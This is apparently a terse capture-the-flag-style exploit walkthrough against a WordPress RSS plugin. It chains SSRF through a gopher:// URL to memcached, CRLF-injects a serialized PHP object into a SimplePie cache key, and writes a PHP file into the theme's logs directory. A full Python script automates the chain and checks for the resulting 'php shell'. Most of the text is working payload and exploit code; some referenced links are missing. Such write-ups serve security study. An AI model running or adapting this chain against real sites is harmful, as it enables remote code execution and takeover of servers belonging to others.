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- PHP Object Injection !!!
- Code :
- <?php
- class TemplateHelper{
- public $file = "h3x.php";
- public $data = "<?php echo 'Mr_hex :( '; ";
- }
- print serialize(new TemplateHelper);
- ?>
- #OutPut :
- O:14:"TemplateHelper":2:{s:4:"file";s:7:"h3x.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}
- let's set Value on memcached !!
- set xct_4e5612ba079c530a6b1f148c0b352241 4 0
- xct_
- look at this link !
- 'prefix' => 'simplepie_', by defulte !!
- so on script : xct_
- look at rss_template.php
- $simplepie->set_cache_location('memcache://');
- 4e5612ba079c530a6b1f148c0b352241
- => md5 => 3903a76d1e6fef0d76e973a0561cbfc0
- 3903a76d1e6fef0d76e973a0561cbfc0:spc => md5 => 4e5612ba079c530a6b1f148c0b352241
- let's see here :
- payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
- SpyD3r = xct_4e5612ba079c530a6b1f148c0b352241
- code = O:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}
- str(len(code)) = len of code
- payload = "_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%2095%0d%0aO:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}%0d%0a"
- replace "+" to "%20" and replace "%25" to "%"
- then let's set value throug SSRF
- there are a lot of ways to bypass SSRF filter !
- read here :
- we'll use gopher wrapper
- Python Script !
- import requests
- import urllib
- url = ""
- code = """O:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}"""
- payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
- encodPayload = urllib.quote_plus(payload).replace("+","%20").replace("%25","%")
- exploit = "gopher://0:11211/_{}".format(encodPayload)
- print("[+] Trying to inject payload !!")
- ssrf_url = url+"awesome-rss/?debug=yes&custom_feed_url="+exploit
- print("[+] {}".format(ssrf_url))
- r = requests.get(ssrf_url)
- r = requests.get(url+"awesome-rss/")
- check_shell = url + "wp-content/themes/twentytwenty/logs/hex.php"
- r_check = requests.get(check_shell)
- if r_check.status_code == 200:
- print("[+] Your php shell : {}".format(check_shell))
- else:
- print("[-] something went wrong !!")
- print("[+] Have a Good Time ):")
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